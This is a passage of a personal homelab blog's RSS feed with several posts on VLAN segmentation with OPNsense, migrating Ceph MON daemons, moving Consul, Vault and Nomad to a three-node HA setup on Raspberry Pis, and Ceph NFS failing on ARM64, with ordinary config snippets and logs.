ID, before they enter the AP&rsquo;s internal switch. This way, they cannot for example
reach the AP&rsquo;s management interface.</p>
<p>And with that, you&rsquo;ve got VLANs on your WiFi networks.</p>
<h1 id="my-vlan-adventure">My VLAN adventure</h1>
<p>Before closing the article, I want to speak a bit about what my VLAN implementation
looks like and provide you with the reason my services were down for an entire
day.</p>
<p>I started thinking about VLANs mostly because I read a lot of other Homelabbers
are using them. My network architecture at that point was mostly flat, with the
DMZ being the only exception. I had the DMZ machine connected to a separate port
on my firewall, with a different subnet and pretty restrictive firewall rules.
Besides that, the entire network was flat. If you were able to plug a cable into
any port or connected to my WiFi, you would have full access to everything. Of
course all of the services were secured, many high value functions were additionally
restricted to only my Command and Control machine, where software allowed IP based
access restrictions.</p>
<p>But it still seemed a bit too open to me, especially with regards to the WiFi.</p>
<p>One of the big advantages I saw was that I could create VLANs and the accompanying
separation purely in software, without having to change the wiring.</p>
<p>I started out with my network looking something like this:</p>
<figure>
    <img loading="lazy" src="initial_state.png"
         alt="A network diagram. Showing a single machine labeled DMZ attached to the firewall. Also attached to the firewall is a switch, connected to a computer labeled Desktop, a printer and a WiFi AP. Another switch is connected to the first switch, with several computers connected to it, collectively labeled Homelab."/> 
</figure>

<p>I had three goals:</p>
<ol>
<li>Separate the WiFi from the rest of the network</li>
<li>Separate the Homelab from the rest of the network</li>
<li>Separate my printer and my DECT VOIP base station from the rest of the network</li>
</ol>
<p>I initially wanted to connect both switches to the firewall directly. My intention
was to combine the two firewall NICs into a single bridge interface. The main
reason for that was to reduce the potential bottleneck when there are machines
from different VLANs connected to the Homelab switch. In those cases, when they
wanted to talk to each other, they would need to go up to the firewall for routing
and then go down again through the same interface.</p>
<p>In the end, that plan was foiled by the fact that FreeBSD (the basis for OPNsense)
does not support putting VLANs on bridge interfaces. From what I read, that is
simply not supported by the BSD networking stack.</p>
<p>So I ended up with keeping the above structure, with the Homelab switch connected
to the firewall through the other switch.</p>
<p>The first VLAN I created was the one for &ldquo;IoT&rdquo; devices. In my setup, that&rsquo;s only
my printer and a DECT (Wireless phone) base station doing VOIP for my landline
connection. I never really trusted the quality of the DECT base station&rsquo;s software
and wanted it out of my main network.</p>
<p>To that end, I started with enabling VLANs on my main switch, which is
directly connected to the firewall. This in itself did not yet block anything,
because by default, Netgear switches set all ports to be members of VLAN 1,
with a default port VLAN ID of 1 and with all ports set to untagged. So packets
were still arriving without a VLAN ID at my firewall and my hosts.</p>
<p>The next step was setting up the VLAN in OPNsense. To avoid loss of connection,
I kept my main LAN side interface, connected to the switch, without a VLAN. But
I did set up a VLAN interface for the IoT VLAN. And here is where I hit my first
real problem I had not foreseen: What IP to assign to the new interface? Because
I still wanted my IoT devices to be able to use the firewall for e.g. DHCP and
DNS. That&rsquo;s when I realized that I would still need different subnets for the
different VLANs. But in hindsight, that&rsquo;s not really a bad thing. By going with
the approach to assign each VLAN into a /24 subnet according to the VLAN ID,
I could immediately know which VLAN a packet was coming from by looking at the
source IP.
So for example, for VLAN 42, I would have the subnet 10.0.42.0/24.</p>
<p>That thought lead directly to the next confusion on my part. And please note
that I wrote the above explanation on how VLANs worked only after the fact. &#x1f609;
I was thinking: Okay, now I&rsquo;m adding a VLAN on top of my LAN interface. But how
would the NIC know whether a packet needs to go to the LAN interface or the VLAN
interface?! It took me longer than I want to admit to realize that of course,
it&rsquo;s not the NIC which delivers the packet to the right interface, it&rsquo;s the
kernel. And the kernel&rsquo;s networking stack then puts it to the right interface.</p>
<p>After I realized that, I finalized the OPNsense config. But I still hadn&rsquo;t wrapped
my head around the config on the switch. How would I tell the switch to deliver
some packets untagged to the firewall (everything besides packets from the IoT
VLAN) and some packets tagged (from the IoT VLAN)? In the end of course, the
answer was pretty simple again: With 802.1Q VLANs, I can configure the port
status separately for each VLAN on the switch. So for the port going to my
firewall I configured the following:</p>
<ol>
<li>For VLAN 1 (the default VLAN), the port was untagged</li>
<li>For my IoT VLAN, the port was tagged</li>
</ol>
<p>This means that all packets coming from my IoT devices would still have their
VLAN ID when arriving at my firewall, and would get sorted to the right, VLAN,
interface. At the same time, the VLAN tag would be stripped out of all packets
coming from VLAN 1 (which was everything else, at this point) and hence would
arrive at my standard, old LAN interface.</p>
<p>Then I just had to setup a couple of firewall rules on the new VLAN IoT interface,
allowing outgoing traffic to the internet and nothing else.</p>
<p>And with that, I finally had found my flow. First, creating the new VLAN on
both switches. Then assigning the right ports to it, all of them in untagged
mode. Then configuring the two trunks, the one between the switches and the
one leading to the firewall, with the new VLAN in tagged mode. And then
creating the interface on the OPNsense firewall. Finally, configuring the new
VLAN&rsquo;s firewall rules, depending on what I want to use it for.</p>
<p>So what does my network look like now? I&rsquo;ve got five VLANs:</p>
<ol>
<li>The administrative VLAN. It allows access to the switches&rsquo; Web UI, the
firewall&rsquo;s Web UI and full access to all hots in the network. Only my
desktop and my Command and Control machine are members.</li>
<li>The IoT VLAN. Members can do exactly one thing: Go out to the Internet.
And then only to certain areas, namely my ISP&rsquo;s VOIP IPs. Members are
currently my VOIP/telephony box and my printer.</li>
<li>The Homelab VLAN. Access only to the internet and each other. Still thinking
whether more segmentation makes sense somewhere here.</li>
<li>The &ldquo;General&rdquo; VLAN. Again only access to the Internet. Currently mostly used
for devices connected to my WiFi.</li>
<li>My DMZ VLAN. Even has its internet outbound connections heavily restricted.</li>
</ol>
<p>The final part was my WiFi. It was the part I was mostly worried about when it
came to the original flat network structure. I thought quite a lot about it. Most
of the time, only my phone and my tablet are connected there. But sometimes I
also connect my laptop, and do Homelab things with it. But I didn&rsquo;t actually
want to give WiFi connected devices too much access. I finally settled for
heavily restricted access, only to the Internet. When I need to do something
from my laptop in the Homelab, I use my VPN to connect. Same for the phone and
tablet.
I&rsquo;ve currently got a task to check whether I can configure multiple WiFis
with my AP and OpenWRT. If so, I will fully go with a MAC filtered WiFi with a
bit more access, for my own devices, and a guest WiFi for everybody else.</p>
<p>And that&rsquo;s it. VLANs in the Homelab! &#x1f389;</p>
<p>Subscribe to the RSS feed to get even more &ldquo;Michael writes an 18 minute article about
some Homelab stuff&rdquo; delights!</p>
]]></content:encoded>
    </item>
    <item>
      <title>Ceph MON Migration</title>
      <link>https://blog.mei-home.net/posts/ceph-mon-migration/</link>
      <pubDate>Mon, 26 Dec 2022 10:38:12 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-mon-migration/</guid>
      <description>Migrating all MON daemons in a Ceph cluster</description>
      <content:encoded><![CDATA[<p>In the course of spreading my homelab over a couple more machines, I finally
arrived at the Ceph cluster&rsquo;s MON daemons. These were running on three Ceph VMs
on my main x86 server up to now. In this post, I will describe how I moved them
to three Raspberry Pis. While the cluster was up the entire time.</p>
<p>First, a couple of considerations:</p>
<ul>
<li>MON daemons use on average about 1GB of memory in my cluster</li>
<li>My cluster, and most of my services, went down during the migration. So please
be cautious if you plan to do your own migration</li>
</ul>
<p>The MON daemons are something of a <em>control plane</em> for Ceph clusters. They hold
the MON map of daemons and data locations. Every client which uses the Ceph
cluster will use them to access a map of available OSDs to work with.</p>
<p><strong>Please Note:</strong> Be cautious with this! If you lose all three of your Monitors,
your cluster is broken.</p>
<p>Due to the centrality of the MON daemons for both, the cluster itself and any
clients, a lot of places potentially hold the IPs of your monitors. Most of the
time, that will be in the form of <code>ceph.conf</code> files.</p>
<p><strong>Clients are generally not automatically receiving new MON addresses. They will
need to be updated manually!</strong></p>
<p>So how did I do it all? I started out with migrating a single daemon. My thinking
here: I can migrate one daemon, then update all three MON&rsquo;s addresses to their
new values everywhere, and then I can migrate the other two daemons as well.</p>
<p>For the sake of this article, let&rsquo;s assume that the old MONs are located on
<code>oldhost1,oldhost2,oldhost3</code> and the new hosts are called <code>newhost1,newhost2,newhost3</code>.</p>
<p>Also note that I&rsquo;m running a <code>cephadm</code> cluster.</p>
<p>So to begin with, a single daemon can be migrated by using the <code>ceph orch apply</code>
command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch apply mon --placement <span style="color:#e6db74">&#34;newhost1,oldhost1,oldhost2&#34;</span>
</span></span></code></pre></div><p>This will disable the MON on <code>oldhost3</code> and place a fresh one on
<code>newhost</code>.
The MON daemons on <code>oldhost1</code> and <code>oldhost2</code> will not be touched at all and
continue running.</p>
<p>At this point, nothing much can go wrong in cluster operations. Any connected
clients will automatically go searching for another MON daemon and find either
<code>oldhost1</code> or <code>oldhost2</code>. But note: Those clients will not automagically get the
IP of <code>newhost1</code> added to their potential MONs. Many parts of the cluster,
including the MON daemons on <code>oldhost1</code> and <code>oldhost2</code>, will be informed about
the new MON daemon.
But other parts of the cluster will not. Among the daemons which will not
automatically get the new MON address are the OSDs and NFS daemons.</p>
<p>At this point, I was not aware that there is any kind of problem.</p>
<p>I then adapted all of the <code>ceph.conf</code> files and other places where the MON IPs
are mentioned. These were:</p>
<ul>
<li>Ceph CSI jobs running in my Nomad cluster</li>
<li><code>ceph.conf</code> files on a number of unmanaged physical hosts</li>
<li>The kernel command lines of my netbooting hosts, which contain the MONs</li>
</ul>
<p>This was where I diverged from my original plan. Instead of just replacing the
IP of <code>oldhost3</code> with the one of <code>newhost1</code>, I went ahead and replaced all of them.</p>
<p>And here&rsquo;s where the problems started. During reboots, my OSDs suddenly were no
longer recognized in the <code>ceph -s</code> output. They were down, even though I could
see that they were up and running on their respective hosts.</p>
<p>The reason for this: The OSDs do not seem to be updated with new MON addresses
automatically, and they also ignore their host&rsquo;s <code>ceph.conf</code> file.
Instead, they have their own conf file, located at <code>/var/lib/ceph/CLUSTER_ID/OSD_NAME/config</code>.
The <code>CLUSTER_ID</code> here is the <code>id:</code> line in the <code>ceph -s</code> output and <code>OSD_NAME</code> is
for example <code>osd.1</code>. That file seems to be a <code>ceph.conf</code> file used by the OSDs.
Just manually changing the MON addresses in there and restarting the daemons
fixed the issue.</p>
<p>I also observed that the NFS daemon I had running did not seem to be working
anymore. It had the same problem and the same solution worked.</p>
<p>A final comment on performance: It seems that Raspberry Pis manage the load
of MON daemons just fine. I&rsquo;ve got three of them hosting the MONs now, and they
are also running Nomad, Consul and Vault servers. The CPU utilization seldom
goes above 10%.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating to 3-node HA for Consul/Vault/Nomad</title>
      <link>https://blog.mei-home.net/posts/ha-nomad-stack/</link>
      <pubDate>Sun, 25 Dec 2022 22:32:44 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ha-nomad-stack/</guid>
      <description>Migrating from a single server instance to HA with three instances for HashiCorp Vault/Nomad/Consul on Raspberry Pis</description>
      <content:encoded><![CDATA[<p>As mentioned in my previous post <a href="https://blog.mei-home.net/posts/cluster_controller_migration/">on migrating the Consul/Vault/Nomad</a>
servers from a VM to a Raspberry Pi,
I was still waiting for some more Pis to arrive to extend the Nomad/Consul/Vault
clusters to a HA configuration for all three. The main reason for this is not
necessarily fault tolerance, but rather gaining the ability to restart the
controllers without taking down the entire Nomad cluster.</p>
<p>Now I&rsquo;d like to give a short overview of the experience, and end with a bit of
an overview on the resource consumption (spoiler: Raspberry Pi 4 4GB are
absolutely sufficient).</p>
<p>The sections on both, Nomad and Consul are going to be pretty short, as both ran
fine and needed few adaptions to the configs. The Vault section is going to be
the really interesting one.</p>
<p>On the order of doing the extension: I started out with Consul. This is due to
the fact that both, Nomad and Vault can use Consul to discover other servers in
the cluster. Plus, I&rsquo;m using the Vault/Nomad Consul service discovery entries in
a number of places. So having new Nomad/Vault server instances register themselves
with Consul right off the bat was necessary.</p>
<p>One important note: Before launching this action, make sure that all access to
your servers goes through some sort of load balancing, not through the DNS name
or IP of your single server.
I&rsquo;m using Consul for this, accessing Nomad via <code>nomad.service.consul</code>, Consul
itself through <code>consul.service.consul</code> and Vault via <code>vault.service.consul</code>.</p>
<p>I have not actually tested what happens when you just point your server access
to a single controller. For Vault, <a href="https://developer.hashicorp.com/vault/docs/concepts/ha#request-forwarding">going by the docs</a>,
this should work out of the box, because standby servers forward requests to
the current master. But I do not know how exactly this works for Nomad or Consul.</p>
<h2 id="consul">Consul</h2>
<p>For Consul to go HA, the changes were minimal. I made two changes in my server
config files on all three nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>retry_join <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;controller1&#34;, &#34;controller2&#34;, &#34;controller3&#34;</span>]
</span></span><span style="display:flex;"><span>bootstrap_expect <span style="color:#f92672">=</span> <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><p>The first line provides the three controller&rsquo;s DNS names, so that each newly
starting server knows who to connect to.</p>
<p>The second line expands the bootstrapping to three servers. Previously, this
was only <code>1</code>. This ensures that when the cluster went completely down, the
three server instances would wait until contact was made to all three before
starting to service requests.</p>
<p>Afterwards, it was just a simple <code>systemctl start consul.service</code>, and the
two new controller nodes automatically got the cluster state from the one already
running instance and then started running normally:</p>
<pre tabindex="0"><code>2022-12-14T22:39:13.376+0100 [INFO]  agent: Synced node info
2022-12-14T22:39:13.037+0100 [INFO]  agent.server.raft: Installed remote snapshot
2022-12-14T22:39:13.036+0100 [INFO]  agent.server.raft: snapshot restore progress: id=138-28922885-1671053952962 last-index=28922885 last-term=138 size-in-bytes=281985 read-bytes=281985 percent-complete=100.00%
2022-12-14T22:39:12.979+0100 [INFO]  agent.server.raft: copied to local snapshot: bytes=281985
2022-12-14T22:39:12.971+0100 [INFO]  agent.server.raft: snapshot network transfer progress: read-bytes=281985 percent-complete=100.00%
2022-12-14T22:39:12.969+0100 [INFO]  agent: Join cluster completed. Synced with initial agents: cluster=LAN num_agents=3
</code></pre><p>And that&rsquo;s it. If, for whatever reason, all three controllers are not available
when the cluster is started cold, just reduce <code>bootstrap_expect</code> to <code>1</code>.</p>
<p>There are two additional important points to take into consideration. First,
if you&rsquo;re using Consul&rsquo;s DNS service discovery, make sure that your DNS is
configured to take all three Consul server instances into account. I&rsquo;m currently
running <a href="https://www.powerdns.com/">PowerDNS</a>, using the <a href="https://docs.powerdns.com/recursor/settings.html#forward-zones-recurse">forward-zones-recurse</a>
config with the <code>consul</code> domain. But in the future, I plan to just launch a
local Consul agent on my DNS machine and point the PowerDNS recursor to it.
Second, also make sure that your Consul servers are listening locally, and that
your Vault and Nomad servers do not do their Consul registration on <code>consul.service.consul</code>.
This would work fine with a single instance. But with multiple instances, you
might end up with multiple registrations for e.g. <code>vault.service.consul</code>, as
the <code>consul.service.consul</code> domain always returns all three Consul servers. So
it is random where e.g. Nomad registers its service - and it is similarly random
where Nomad tries to deregister the service!
Instead, best practice is to always do the service registration against the local
Consul agent - be that a client or a server.</p>
<h2 id="nomad">Nomad</h2>
<p>For Nomad, enabling HA is even simpler. I only needed to up the <code>bootstrap_expect</code>
setting to <code>3</code> and start up the additional Nomad server instances. No other
changes necessary. Due to the fact that Nomad uses Consul for server discovery.</p>
<p>If you do not have Consul set up, you will have to add all of your Nomad servers
to the <code>retry_join</code> config option. This has to happen on both, your server configs
and your client configs!</p>
<h2 id="vault">Vault</h2>
<p>Vault is the most complicated migration of the bunch. This is mostly due to the
fact that I started out using the simple <code>file</code> backend. This backend does not
support Vault&rsquo;s HA functionality. When choosing a backend, you can check
<a href="https://developer.hashicorp.com/vault/docs/configuration/storage">the Vault documentation</a>
for the different backends.</p>
<p>Because my backend does not support Vault HA, I first had to do a Vault backend
migration. This is an officially supported process for switching backends.
The docs can be found <a href="https://developer.hashicorp.com/vault/docs/commands/operator/migrate#operator-migrate">here</a>.</p>
<p>I decided to switch to the <a href="https://developer.hashicorp.com/vault/docs/configuration/storage/raft">Vault integrated backend</a>,
as it is officially supported by HashiCorp and proposed as the default backend
for HA.
One important <em>note</em> on the Integrated backend: Even though it is based on the
raft consensus protocol, it also works with a single node. So you don&rsquo;t have to
worry about switching backends and having to enable HA right away.</p>
<p>The <code>vault operator migrate</code> command uses a special configuration file to
facilitate the migration. Because I was switching from the <a href="https://developer.hashicorp.com/vault/docs/configuration/storage/filesystem">file backend</a>
to the integrated backend, my file looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">storage_source</span> <span style="color:#e6db74">&#34;file&#34;</span> {
</span></span><span style="display:flex;"><span>   path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault_storage&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">storage_destination</span> <span style="color:#e6db74">&#34;raft&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/new_vault_storage&#34;</span>
</span></span><span style="display:flex;"><span>  node_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;controller1&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>cluster_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller1:8201&#34;</span>
</span></span></code></pre></div><p>The <code>node_id</code> config option is optional, and should be unique for each server
instance. I ensured this by using each server host&rsquo;s hostname. The <code>cluster_addr</code>
also needs to be configured to the cluster address under which the local server&rsquo;s
HTTP(s) interface can be reached. Again, this is just the hostname for me.
Two important points to note:</p>
<ol>
<li>The Vault server should be taken offline during the migration</li>
<li>The migration does not automatically create the <code>path</code> directory. It needs
to be created manually.</li>
</ol>
<p>Once the config file is created, all directories are created and the server has
been stopped, execute the migration command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault operator migrate -config /path/to/migration/config.hcl
</span></span></code></pre></div><p>Before restarting the server now, you need to make sure to also adapt the server&rsquo;s
config file. I removed the <code>storage &quot;file&quot;</code> section from mine, and added the
following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">storage</span> <span style="color:#e6db74">&#34;raft&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault_data&#34;</span>
</span></span><span style="display:flex;"><span>  node_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;controller1&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller1:8200&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller2:8200&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller3:8200&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>disable_mlock <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>As you might note, there is no <code>bootstrap_expect</code> config this time. But the
raft storage backend (which is just another name for the &ldquo;Vault integrated storage&rdquo;)
requires setting of <code>retry_join</code>. I just hardcoded my three servers in here, but
other configs, including some cloud provider&rsquo;s APIs, are also supported here.
The <code>disable_mlock</code> is a recommended configuration when using the <code>raft</code> backend.</p>
<p>After that, I just restarted the currently still single server instance, which
went through without a problem. Don&rsquo;t forget to also unseal it at this point!</p>
<p>Then I went forward and configured the two other Vault servers. Remember to adapt
the <code>node_id</code> config option for each server instance.</p>
<p>After launching the other two servers, I was greeted with a lot of error
messages along these lines:</p>
<pre tabindex="0"><code>Vault is sealed
</code></pre><p>In HA Vault, each Server instance still needs to be unsealed individually. Just
running <code>operator unseal</code> on the currently active Vault server is not enough.
There is an <a href="https://developer.hashicorp.com/vault/tutorials/auto-unseal">auto-unseal feature</a>.
But it requires additional components and is geared more towards large scale
setups on one of the hyperscaler&rsquo;s clouds.</p>
<p>Once I unsealed all three servers, Vault got up and running properly without
further problems.</p>
<p>In addition to the above, I also started to make use of Vault&rsquo;s Consul service
registration. The docs can be found <a href="https://developer.hashicorp.com/vault/docs/configuration/service-registration/consul">here</a>.
This functionality is only available with a HA capable backend, for some reason.
With it configured, I no longer needed my homemade Vault service config file,
which I fed to Consul.
The config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">service_registration</span> <span style="color:#e6db74">&#34;consul&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;127.0.0.1:8501&#34;</span>
</span></span><span style="display:flex;"><span>  token <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;your consul token here&#34;</span>
</span></span><span style="display:flex;"><span>  scheme <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The important point here is to use the local Consul agent. Do not use Consul&rsquo;s
DNS service discovery via <code>consul.service.consul</code>, because that returns all
Consul servers, meaning that the Vault instance might register with one Consul
server, but try to deregister from another. This will leave behind stale Vault
service registrations.</p>
<h2 id="performance">Performance</h2>
<p>Finally, a short word on resource utilization: HA carries some costs with it.
I&rsquo;m running the Vault/Nomad/Consul servers on three Raspberry Pis. The total
CPU consumption after enabling HA for the three servers increased by 1-2%. Not
too significant, but measurable.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Ceph NFS on ARM64: Not currently possible</title>
      <link>https://blog.mei-home.net/posts/ceph_nfs_arm64/</link>
      <pubDate>Wed, 21 Dec 2022 16:47:27 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph_nfs_arm64/</guid>
      <description>Running Ceph&amp;#39;s NFS component on ARM64 is currently impossible due to missing ganesha packages for ARM64</description>
      <content:encoded><![CDATA[<p>Today, I wanted to migrate my single Ceph NFS daemon from my LXD VM on an x86
server to my Hardkernel H3. This did not work out too well.
Yesterday, I had finally finished the migration of my Ceph cluster&rsquo;s MON daemons
to my three Raspberry Pi controllers. This move had it&rsquo;s own problems, which I
will detail a bit in another blog entry.
Part of this migration was to also move over the MGR daemons to my Pis. This
actually worked without any problem - I thought.</p>
<p>Ceph&rsquo;s <a href="https://docs.ceph.com/en/latest/mgr/">MGR daemon</a> serves a number of
functions related to managing a Ceph cluster. It provides the rather nicely made
Ceph Dashboard, for example. Its most important task though is controlling the
<a href="https://docs.ceph.com/en/latest/mgr/orchestrator/">Orchestrator</a> accessible
with the <code>ceph orch</code> CLI interface. Of particular interest for this post though
is the <code>ceph nfs</code> <a href="https://docs.ceph.com/en/latest/mgr/nfs/">NFS module</a>.
This module allows a user to run an NFS server (or multiple) which are backed
by S3 buckets or CephFS volumes. In my setup, I&rsquo;m using this functionality to
have an NFS export which houses the <code>/boot</code> partitions of my netbooting machines.
For details of my setup, have a look at <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#nfs-boot-dir">this previous post</a>.</p>
<p>So now what happened today? I wanted to migrate my NFS daemon from the VM it was
running on to my Hardkernel H3.</p>
<p>First step: Adding a second NFS daemon on the new host, while leaving the old
daemon untouched:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch apply nfs my-nfs --placement <span style="color:#e6db74">&#34;newhost,oldhost&#34;</span>
</span></span></code></pre></div><p>The result of this was an error message along these lines:</p>
<pre tabindex="0"><code>bash[61872]: debug 2022-12-21T11:57:05.302+0000 ffff84614280 -1 log_channel(cephadm) log [ERR] : Failed to apply nfs.my-nfs spec NFSServiceSpec.from_json(yaml.safe_load(&#39;&#39;&#39;service_type: nfs
bash[61872]: service_id: hn-nfs
bash[61872]: service_name: nfs.hn-nfs
bash[61872]: placement:
bash[61872]:   hosts:
bash[61872]:   - khonsu
bash[61872]: &#39;&#39;&#39;)): [Errno 2] No such file or directory: &#39;ganesha-rados-grace&#39;: &#39;ganesha-rados-grace&#39;
bash[61872]: Traceback (most recent call last):
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/serve.py&#34;, line 507, in _apply_all_services
bash[61872]:     if self._apply_service(spec):
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/serve.py&#34;, line 760, in _apply_service
bash[61872]:     daemon_spec = svc.prepare_create(daemon_spec)
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/services/nfs.py&#34;, line 66, in prepare_create
bash[61872]:     daemon_spec.final_config, daemon_spec.deps = self.generate_config(daemon_spec)
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/services/nfs.py&#34;, line 87, in generate_config
bash[61872]:     self.run_grace_tool(spec, &#39;add&#39;, nodeid)
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/services/nfs.py&#34;, line 225, in run_grace_tool
bash[61872]:     timeout=10)
bash[61872]:   File &#34;/lib64/python3.6/subprocess.py&#34;, line 423, in run
bash[61872]:     with Popen(*popenargs, **kwargs) as process:
bash[61872]:   File &#34;/lib64/python3.6/subprocess.py&#34;, line 729, in __init__
bash[61872]:     restore_signals, start_new_session)
bash[61872]:   File &#34;/lib64/python3.6/subprocess.py&#34;, line 1364, in _execute_child
bash[61872]:     raise child_exception_type(errno_num, err_msg, err_filename)
bash[61872]: FileNotFoundError: [Errno 2] No such file or directory: &#39;ganesha-rados-grace&#39;: &#39;ganesha-rados-grace&#39;
</code></pre><p>So it&rsquo;s missing the file <code>ganesha-rados-grace</code> in the Docker image Ceph uses.
A quick google of the error message leads to <a href="https://github.com/ceph/ceph-build/issues/1979">this bug</a>
in Ceph&rsquo;s GitHub repo. As indicated in the bug, the <a href="https://github.com/nfs-ganesha/nfs-ganesha">nfs-ganesha</a>
package is not available for ARM64. Ganesha is an enhanced NFS server which allows
the user to provide a lot of different types of storage via NFS to users.</p>
<p>I&rsquo;m honestly not sure what the problem is here, but for me it just reads as if
Ganesha is not build for ARM64. So it doesn&rsquo;t become part of the ARM64 Ceph
container.</p>
<p>One of the reasons it took me so long to realize that this was the problem I
actually encountered: The new NFS daemon was supposed to run on the Hardkernel
H3 - and that&rsquo;s just an x86 machine. After some more tests, I finally realized
that the above error wasn&rsquo;t coming from the failed daemon start - it was coming
from my MGR instances on my Raspberry Pi!</p>
<p>And this makes sense: There are a couple of ganesha commands which need to be run
when a new daemon is initialized. And those commands run as part of the MGR NFS
module - and so are executed on the MGR host, not on the host which is going to
run the NFS daemon.</p>
<p>My only possible solution for now: Adding another MGR instance to the H3 (luckily
it has enough memory) and making that the active MGR instance whenever I need to
run NFS commands. Which should not be too often.</p>
<p>But as a consequence of this problem, I&rsquo;m now considering whether I should
just go ahead and order another two H3 to have all my Ceph nodes on x86. Decision
to be made later.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Cluster Controller Migration to a Raspberry Pi 4</title>
      <link>https://blog.mei-home.net/posts/cluster_controller_migration/</link>
      <pubDate>Sat, 10 Dec 2022 13:02:35 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/cluster_controller_migration/</guid>
      <description>Migrating my Vault/Nomad/Consul servers to a new host</description>
      <content:encoded><![CDATA[<p>I am currently working on distributing my Homelab a little bit more. My main
driver is high availability. Do I need high availability in a homelab setup?
No, not really. But I was getting annoyed by having to take down the entire
Homelab whenever I was doing an update on my single server.</p>
<p>The newest part of that project is my cluster controller. That is the machine
running the servers for my <a href="https://www.vaultproject.io/">Vault</a>,
<a href="https://www.consul.io/">Consul</a> and <a href="https://www.nomadproject.io/">Nomad</a>
cluster. Before the migration, this was yet another LXD VM on my homeserver. Now,
it&rsquo;s a Raspberry Pi 4 4GB.</p>
<p>This single Raspberry Pi will be joined by two more, so I will end up with three
instances of each of the servers. With that, I can finally reboot machines to
my heart&rsquo;s content without having to worry about currently running jobs. &#x1f389;
But this high availability nirvana is currently withheld by Amazon/DHL being
unable to ship me my stuff. Seriously. For years, not a single problem with
delivery. But now all of a sudden, nothing arrives.</p>
<p>But enough venting. With time, it will all find it&rsquo;s way to me. So for now,
enjoy this story of my migration. It will contain a lot of nerdery, large amounts
of exhilaration and, surprisingly, not a single &ldquo;Darn it. I will have to re-image
my entire homelab&rdquo; moment.</p>
<h2 id="preparations">Preparations</h2>
<p>This was actually a hefty part of the time I spend on this. Last weekend, I sat
down with all my Homelab repos and grep, because I had used both, the single
cluster controller&rsquo;s IP and hostname throughout my Ansible files, Terraform
files and just general scripting.
That was remedied by redirecting (almost, more later) everything to each
service&rsquo;s Consul supplied DNS entry, e.g. <code>nomad.service.consul</code> or
<code>vault.service.consul</code>.</p>
<p>With that taken care of, I read through all three tool&rsquo;s HA/multi-server setup
documentation. The most straightforward (I thought&hellip;) was Vault, which doesn&rsquo;t
actually have a clustered mode, but only failover with some capability of
forwarding requests to the current leader from the standbys. Both Nomad and Consul
were a bit more complicated, in that they fully support multiple active servers.</p>
